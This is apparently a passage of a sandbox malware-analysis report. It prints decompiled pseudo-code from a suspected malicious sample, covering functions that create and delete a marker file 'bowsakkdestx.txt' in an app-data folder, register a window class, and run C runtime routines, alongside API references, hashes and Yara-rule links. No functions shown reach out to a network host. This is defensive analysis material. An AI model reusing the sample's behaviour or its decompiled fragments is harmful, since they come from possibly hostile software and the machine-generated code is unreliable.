				_t4 =  &_v264;
				_t18 = __ecx;
				__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t4);
				if(_t4 >= 0) {
					PathAppendA( &_v264, "bowsakkdestx.txt");
					_t20 = E004220B6( &_v264, "w");
					__eflags = _t20;
					if(__eflags != 0) {
						_push(_t20);
						_push(lstrlenA(_t18));
						_push(1);
						_push(_t18);
						E00422B02(__ebx, _t17, _t18, _t20, __eflags);
						_push(_t20);
						E00423A38(__ebx, _t18, _t20, __eflags);
						return 1;
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return 0;
				}
			}

0x0040c470
0x0040c479
0x0040c489
0x0040c48b
0x0040c493
0x0040c4a9
0x0040c4c0
0x0040c4c5
0x0040c4c7
0x0040c4d1
0x0040c4d9
0x0040c4da
0x0040c4dc
0x0040c4dd
0x0040c4e2
0x0040c4e3
0x0040c4f2
0x0040c4c9
0x0040c4ca
0x0040c4d0
0x0040c4d0
0x0040c495
0x0040c49b
0x0040c49b

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9

Strings

bowsakkdestx.txt, xrefs: 0040C49D

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: Path$AppendFolder
String ID: bowsakkdestx.txt
API String ID: 29327785-2616962270
Opcode ID: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
Opcode Fuzzy Hash: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5

Uniqueness

Uniqueness Score: -1.00%

Function 00423B4C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00423B4C(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				char* _v16;
				char _v28;
				signed char _v32;
				void* _t10;
				void* _t19;
				intOrPtr* _t22;
				void* _t24;
				void* _t25;
				intOrPtr* _t27;

				_t25 = __edi;
				_t24 = __edx;
				_t19 = __ebx;
				while(1) {
					_t10 = E00420C62(_t19, _t24, _t25, _a4);
					if(_t10 != 0) {
						break;
					}
					if(E0042793D(_t10, _a4) == 0) {
						_push(1);
						_v16 = "bad allocation";
						_t22 =  &_v28;
						E00430D21(_t22,  &_v16);
						_v28 = 0x4cf748;
						E00430ECA( &_v28, 0x50793c);
						asm("int3");
						_t27 = _t22;
						 *_t27 = 0x4cf748;
						E00430D91(_t22);
						if((_v32 & 0x00000001) != 0) {
							L00422587(_t27);
						}
						return _t27;
					} else {
						continue;
					}
					L7:
				}
				return _t10;
				goto L7;
			}

0x00423b4c
0x00423b4c
0x00423b4c
0x00423b61
0x00423b64
0x00423b6c
0x00000000
0x00000000
0x00423b5f
0x00423b72
0x00423b77
0x00423b7f
0x00423b82
0x00423b8f
0x00423b97
0x00423b9c
0x00423ba1
0x00423ba3
0x00423ba9
0x00423bb2
0x00423bb5
0x00423bba
0x00423bbf
0x00000000
0x00000000
0x00000000
0x00000000
0x00423b5f
0x00423b71
0x00000000

APIs

_malloc.LIBCMT ref: 00423B64

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(008C0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

std::exception::exception.LIBCMT ref: 00423B82
__CxxThrowException@8.LIBCMT ref: 00423B97

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

Strings

bad allocation, xrefs: 00423B77

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
String ID: bad allocation
API String ID: 3074076210-2104205924
Opcode ID: cec20dc94eea93260f8f1a03c5a4f6d1a6107b38a2b917b0c89c9f691c6c4a85
Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
Opcode Fuzzy Hash: cec20dc94eea93260f8f1a03c5a4f6d1a6107b38a2b917b0c89c9f691c6c4a85
Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BA10(intOrPtr __ecx) {
				struct _WNDCLASSEXW _v52;

				_v52.cbSize = 0x30;
				_v52.style = 3;
				_v52.lpfnWndProc = E0041BAE0;
				_v52.cbClsExtra = 0;
				_v52.cbWndExtra = 0;
				_v52.hInstance = __ecx;
				_v52.hIcon = 0;
				_v52.hCursor = LoadCursorW(0, 0x7f00);
				_v52.hbrBackground = 6;
				_v52.lpszMenuName = 0;
				_v52.lpszClassName = L"LPCWSTRszWindowClass";
				_v52.hIconSm = 0;
				return RegisterClassExW( &_v52);
			}

0x0041ba1d
0x0041ba24
0x0041ba2b
0x0041ba32
0x0041ba39
0x0041ba40
0x0041ba43
0x0041ba50
0x0041ba57
0x0041ba5e
0x0041ba65
0x0041ba6c
0x0041ba7c

APIs

LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
RegisterClassExW.USER32 ref: 0041BA73

Strings

LPCWSTRszWindowClass, xrefs: 0041BA65
0, xrefs: 0041BA1D

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: ClassCursorLoadRegister
String ID: 0$LPCWSTRszWindowClass
API String ID: 1693014935-1496217519
Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040C420() {
				char _v264;
				CHAR* _t4;

				_t4 =  &_v264;
				__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t4);
				if(_t4 >= 0) {
					PathAppendA( &_v264, "bowsakkdestx.txt");
					return DeleteFileA( &_v264);
				}
				return _t4;
			}

0x0040c429
0x0040c438
0x0040c440
0x0040c44e
0x00000000
0x0040c45b
0x0040c464

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
DeleteFileA.KERNEL32(?), ref: 0040C45B

Strings

bowsakkdestx.txt, xrefs: 0040C442

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: Path$AppendDeleteFileFolder
String ID: bowsakkdestx.txt
API String ID: 610490371-2616962270
Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55

Uniqueness

Uniqueness Score: -1.00%

Function 00427C2E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E00427C2E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, char _a4) {

				_t15 = __eflags;
				E00427F51(__ebx, __edx, __edi, __esi, __eflags);
				_t1 =  &_a4; // 0x423b69
				E00427FAE(__ebx, __edx, __edi, __esi,  *_t1);
				E00427CEC(0xff);
				asm("int3");
				_push(1);
				_push(1);
				_push(0);
				return E00427E0E(__ebx, __edi, __esi, _t15);
			}

0x00427c2e
0x00427c31
0x00427c36
0x00427c39
0x00427c44
0x00427c49
0x00427c4a
0x00427c4c
0x00427c4e
0x00427c58

APIs

__FF_MSGBANNER.LIBCMT ref: 00427C31

Part of subcall function 00427F51: __NMSG_WRITE.LIBCMT ref: 00427F78
Part of subcall function 00427F51: __NMSG_WRITE.LIBCMT ref: 00427F82

__NMSG_WRITE.LIBCMT ref: 00427C39

Part of subcall function 00427FAE: GetModuleFileNameW.KERNEL32(00000000,005104BA,00000104,?,00000001,i;B), ref: 00428040
Part of subcall function 00427FAE: ___crtMessageBoxW.LIBCMT ref: 004280EE

Part of subcall function 00427CEC: _doexit.LIBCMT ref: 00427CF6

_doexit.LIBCMT ref: 00427C50

Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
Part of subcall function 00427E0E: RtlDecodePointer.NTDLL(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EE4
Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EF5

Strings

i;B, xrefs: 00427C36

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$Encode__initterm_doexit$FileMessageModuleName___crt__lock
String ID: i;B
API String ID: 2447380256-472376889
Opcode ID: 153482db97bfda71f73a9d163006c74db99129bc5c403b59fea0bac6b8996c12
Instruction ID: 2444216041853f974cc06d1078168a6e61cf6443a39b7242863de3565bbad4eb
Opcode Fuzzy Hash: 153482db97bfda71f73a9d163006c74db99129bc5c403b59fea0bac6b8996c12
Instruction Fuzzy Hash: 0CC0122079C31826E9513362FD43B5832065B00B08FD2002ABB081D4C2E9CA5594409A

Uniqueness

Uniqueness Score: -1.00%

Function 0040ECB0 Relevance: 6.2, APIs: 4, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040ECB0(intOrPtr* __ecx, char _a4, char _a20, intOrPtr _a24, char _a28, intOrPtr _a48) {
				char _v8;
				intOrPtr _v16;
				char* _v20;
				char _v32;
				intOrPtr _v36;
				char _v40;
				char _v56;
				void* __ebx;
				void* __edi;
				void* __ebp;
				char* _t82;
				intOrPtr _t85;
				intOrPtr _t99;
				intOrPtr* _t112;
				signed int _t116;
				intOrPtr* _t122;
				void* _t123;
				char* _t129;
				char* _t132;
				intOrPtr _t134;
				intOrPtr* _t136;
				intOrPtr _t138;
				void* _t139;

				_push(0xffffffff);
				_push(0x4caa30);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t138;
				_t139 = _t138 - 0x28;
				_push(_t132);
				_t136 = __ecx;
				_v8 = 0;
				_t82 = 0;
				_t112 = 0;
				_v20 = 0;
				if( &_v32 != __ecx) {
					_t82 =  *__ecx;
					 *__ecx = 0;
					_t112 =  *((intOrPtr*)(__ecx + 4));
					 *((intOrPtr*)(__ecx + 4)) = 0;
					_v20 = _t82;
					 *((intOrPtr*)(__ecx + 8)) = 0;
				}
				_v8 = 1;
				if(_t82 == 0) {
					L10:
					if(_a20 == 0) {
						L39:
						if(_a24 >= 0x10) {
							_t82 = L00422587(_a4);
							_t139 = _t139 + 4;
						}
						_a24 = 0xf;
						_a20 = 0;
						_a4 = 0;
						if(_a48 >= 0x10) {
							_t82 = L00422587(_a28);
						}
						 *[fs:0x0] = _v16;
						return _t82;
					}
					_t121 =  >=  ? _a28 :  &_a28;
					_push( >=  ? _a28 :  &_a28);
					_t84 =  >=  ? _a4 :  &_a4;
					_push( >=  ? _a4 :  &_a4);
					_t82 = E00421B3B();
					_t129 = _t82;
					_t139 = _t139 + 8;
					if(_t129 == 0) {
						goto L39;
					}
					do {
						_v36 = 0xf;
						_v40 = 0;
						_v56 = 0;
						if( *_t129 != 0) {
							_t122 = _t129;
							_t23 = _t122 + 1; // 0x1
							_t132 = _t23;
							do {
								_t85 =  *_t122;
								_t122 = _t122 + 1;
							} while (_t85 != 0);
							_t123 = _t122 - _t132;
							L18:
							_push(_t123);
							_t124 =  &_v56;
							E004156D0(_t112,  &_v56, _t132, _t129);
							_v8 = 3;
							_t134 =  *((intOrPtr*)(_t136 + 4));
							if( &_v56 >= _t134) {
								L28:
								if(_t134 ==  *((intOrPtr*)(_t136 + 8))) {
									E00415230(_t112, _t136, _t134, _t124);
								}
								_t132 =  *((intOrPtr*)(_t136 + 4));
								if(_t132 != 0) {
									 *((intOrPtr*)(_t132 + 0x14)) = 0xf;
									 *((intOrPtr*)(_t132 + 0x10)) = 0;
									 *_t132 = 0;
									if(_v36 >= 0x10) {
										 *_t132 = _v56;
										_v56 = 0;
									} else {
										_t95 = _v40 + 1;
										if(_v40 + 1 != 0) {
											E004205A0(_t132,  &_v56, _t95);
											_t139 = _t139 + 0xc;
										}
									}
									 *((intOrPtr*)(_t132 + 0x10)) = _v40;
									 *((intOrPtr*)(_t132 + 0x14)) = _v36;
									_v36 = 0xf;
									_v40 = 0;
									_v56 = 0;
								}
								goto L36;
							}
							_t99 =  *_t136;
							_t124 =  &_v56;
							if(_t99 > _t124) {
								goto L28;
							}
							_t126 = _t124 - _t99;
							_t116 = (0x2aaaaaab * (_t124 - _t99) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t124 - _t99) >> 0x20 >> 2);
							if(_t134 ==  *((intOrPtr*)(_t136 + 8))) {
								E00415230(_t116, _t136, _t134, _t126);
							}
							_t112 =  *((intOrPtr*)(_t136 + 4));
							_t132 =  *_t136 + (_t116 + _t116 * 2) * 8;
							if(_t112 != 0) {
								 *((intOrPtr*)(_t112 + 0x14)) = 0xf;
								 *((intOrPtr*)(_t112 + 0x10)) = 0;
								 *_t112 = 0;
								if( *((intOrPtr*)(_t132 + 0x14)) >= 0x10) {
									 *_t112 =  *_t132;
									 *_t132 = 0;
								} else {
									_t107 =  *((intOrPtr*)(_t132 + 0x10)) + 1;
									if( *((intOrPtr*)(_t132 + 0x10)) + 1 != 0) {
										E004205A0(_t112, _t132, _t107);
										_t139 = _t139 + 0xc;
									}
								}
								 *((intOrPtr*)(_t112 + 0x10)) =  *((intOrPtr*)(_t132 + 0x10));
								 *((intOrPtr*)(_t112 + 0x14)) =  *((intOrPtr*)(_t132 + 0x14));
								 *((intOrPtr*)(_t132 + 0x14)) = 0xf;
								 *((intOrPtr*)(_t132 + 0x10)) = 0;
								 *_t132 = 0;
							}
							goto L36;
						}
						_t123 = 0;
						goto L18;
						L36:
						 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 0x18;
						_v8 = 1;
						if(_v36 >= 0x10) {
							L00422587(_v56);
							_t139 = _t139 + 4;
						}
						_t89 =  >=  ? _a28 :  &_a28;
						_push( >=  ? _a28 :  &_a28);
						_push(0);
						_t82 = E00421B3B();
						_t129 = _t82;
						_t139 = _t139 + 8;
					} while (_t129 != 0);
					goto L39;
				}
				_t132 = _t82;
				if(_t82 == _t112) {
					L9:
					_t82 = L00422587(_t82);
					_t139 = _t139 + 4;
					goto L10;
				} else {
					do {
						if( *((intOrPtr*)(_t132 + 0x14)) >= 0x10) {
							L00422587( *_t132);
							_t139 = _t139 + 4;
						}
						 *((intOrPtr*)(_t132 + 0x14)) = 0xf;
						 *((intOrPtr*)(_t132 + 0x10)) = 0;
						 *_t132 = 0;
						_t132 = _t132 + 0x18;
					} while (_t132 != _t112);
					_t82 = _v20;
					goto L9;
				}
			}

0x0040ecb3
0x0040ecb5
0x0040ecc0
0x0040ecc1
0x0040ecc8
0x0040eccd
0x0040ecce
0x0040ecd0
0x0040ecd7
0x0040ecd9
0x0040ecdb
0x0040ece3
0x0040ece5
0x0040ece7
0x0040ece9
0x0040ecec
0x0040ecf3
0x0040ecf6
0x0040ecf6
0x0040ecfd
0x0040ed03
0x0040ed44
0x0040ed48
0x0040eefc
0x0040ef00
0x0040ef05
0x0040ef0a
0x0040ef0a
0x0040ef11
0x0040ef18
0x0040ef1f
0x0040ef23
0x0040ef28
0x0040ef2d
0x0040ef35
0x0040ef40
0x0040ef40
0x0040ed58
0x0040ed60
0x0040ed61
0x0040ed65
0x0040ed66
0x0040ed6b
0x0040ed6d
0x0040ed72
0x00000000
0x00000000
0x0040ed80
0x0040ed83
0x0040ed8a
0x0040ed91
0x0040ed95
0x0040ed9b
0x0040ed9d
0x0040ed9d
0x0040eda0
0x0040eda0
0x0040eda2
0x0040eda3
0x0040eda7
0x0040eda9
0x0040eda9
0x0040edab
0x0040edae
0x0040edb3
0x0040edba
0x0040edbf
0x0040ee58
0x0040ee5b
0x0040ee60
0x0040ee60
0x0040ee65
0x0040ee6a
0x0040ee6c
0x0040ee73
0x0040ee7a
0x0040ee81
0x0040ee9c
0x0040ee9e
0x0040ee83
0x0040ee86
0x0040ee87
0x0040ee8f
0x0040ee94
0x0040ee94
0x0040ee87
0x0040eea8
0x0040eeae
0x0040eeb1
0x0040eeb8
0x0040eebf
0x0040eebf
0x00000000
0x0040ee6a
0x0040edc5
0x0040edc7
0x0040edcc
0x00000000
0x00000000
0x0040edd2
0x0040ede3
0x0040ede8
0x0040eded
0x0040eded
0x0040edf7
0x0040edfa
0x0040edff
0x0040ee05
0x0040ee0c
0x0040ee13
0x0040ee1a
0x0040ee31
0x0040ee33
0x0040ee1c
0x0040ee1f
0x0040ee20
0x0040ee25
0x0040ee2a
0x0040ee2a
0x0040ee20
0x0040ee3c
0x0040ee42
0x0040ee45
0x0040ee4c
0x0040ee53
0x0040ee53
0x00000000
0x0040edff
0x0040ed97
0x00000000
0x0040eec3
0x0040eec3
0x0040eec7
0x0040eecf
0x0040eed4
0x0040eed9
0x0040eed9
0x0040eee3
0x0040eee7
0x0040eee8
0x0040eeea
0x0040eeef
0x0040eef1
0x0040eef4
0x00000000
0x0040ed80
0x0040ed05
0x0040ed09
0x0040ed3b
0x0040ed3c
0x0040ed41
0x00000000
0x0040ed0b
0x0040ed10
0x0040ed14
0x0040ed18
0x0040ed1d
0x0040ed1d
0x0040ed20
0x0040ed27
0x0040ed2e
0x0040ed31
0x0040ed34
0x0040ed38
0x00000000
0x0040ed38

APIs

_strtok.LIBCMT ref: 0040ED66
_memmove.LIBCMT ref: 0040EE25

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: _memmove_strtok
String ID:
API String ID: 3446180046-0
Opcode ID: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
Opcode Fuzzy Hash: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00422130 Relevance: 6.2, APIs: 4, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E00422130(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				_t124 = _t99;
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E0042B420(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(__eflags == 0) {
							goto L3;
						} else {
							__eflags = _t97 - (_t74 | 0xffffffff) / _a12;
							if(__eflags > 0) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E0042B2F2(_t98, _t119, _t119);
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(__eflags != 0) {
													E0042B420(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E00425208(__eflags))) = 0x22;
												L4:
												E004242D2();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_v8 = _t110 + 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E0042816B(_t119));
											_t88 = E0042B5C4();
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E00429544(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										_t120 = _t120 + 0x10;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E00425208(_t124))) = 0x16;
				goto L4;
			}

0x0042213a
0x0042213d
0x00422143
0x00422146
0x00422149
0x00422166
0x00000000
0x00422166
0x0042214b
0x00422150
0x00000000
0x00000000
0x00422152
0x00422154
0x0042216f
0x00422172
0x00422174
0x00422182
0x00422182
0x00422186
0x0042218e
0x00422193
0x00422193
0x00422196
0x00422198
0x00000000
0x0042219a
0x004221a2
0x004221a4
0x00000000
0x00000000
0x004221a6
0x004221a9
0x004221ac
0x004221b3
0x004221b5
0x004221bc
0x004221b7
0x004221b7
0x004221b7
0x004221c1
0x004221c4
0x004221c6
0x004222af
0x00000000
0x004221cc
0x004221cc
0x004221cc
0x004221d3
0x00422214
0x00422214
0x00422216
0x00422281
0x00422287
0x0042228a
0x004222e1
0x00000000
0x004222e7
0x0042228c
0x0042228f
0x00422291
0x004222b7
0x004222b7
0x004222bb
0x004222c5
0x004222ca
0x004222d2
0x00422161
0x00422161
0x00000000
0x00422161
0x00422293
0x00422296
0x00422299
0x0042229a
0x0042229d
0x0042229d
0x0042229e
0x004222a1
0x004222a4
0x00000000
0x004222a4
0x00422218
0x0042221a
0x0042223e
0x00422243
0x00422249
0x0042224b
0x0042224b
0x0042221c
0x0042221e
0x00422224
0x00422236
0x00422236
0x00422236
0x00422238
0x00422226
0x0042222b
0x0042222d
0x0042222d
0x0042223a
0x0042223a
0x0042224d
0x00422250
0x00000000
0x00422252
0x00422252
0x00422253
0x0042225d
0x0042225e
0x00422263
0x00422266
0x00422268
0x004222ef
0x00000000
0x004222ef
0x0042226e
0x00422271
0x004222dd
0x004222dd
0x004222dd
0x004222dd
0x00000000
0x004222dd
0x00422273
0x00422273
0x00422275
0x00422275
0x00422278
0x0042227b
0x00000000
0x0042227b
0x00422250
0x004221d5
0x004221d8
0x004221db
0x004221dd
0x00000000
0x00000000
0x004221df
0x00000000
0x00000000
0x004221e5
0x004221e7
0x004221e9
0x004221eb
0x004221eb
0x004221ee
0x004221f1
0x004221f3
0x00000000
0x004221f9
0x00422200
0x00422205
0x00422208
0x0042220b
0x0042220e
0x00422210
0x00000000
0x00422210
0x004222a7
0x004222a7
0x004222a7
0x00000000
0x004221cc
0x004221c6
0x00422198
0x0042217b
0x0042217e
0x00422180
0x00000000
0x00000000
0x00000000
0x00422180
0x00422156
0x0042215b
0x00000000

APIs

_memset.LIBCMT ref: 0042218E
__read_nolock.LIBCMT ref: 0042225E
__filbuf.LIBCMT ref: 00422281
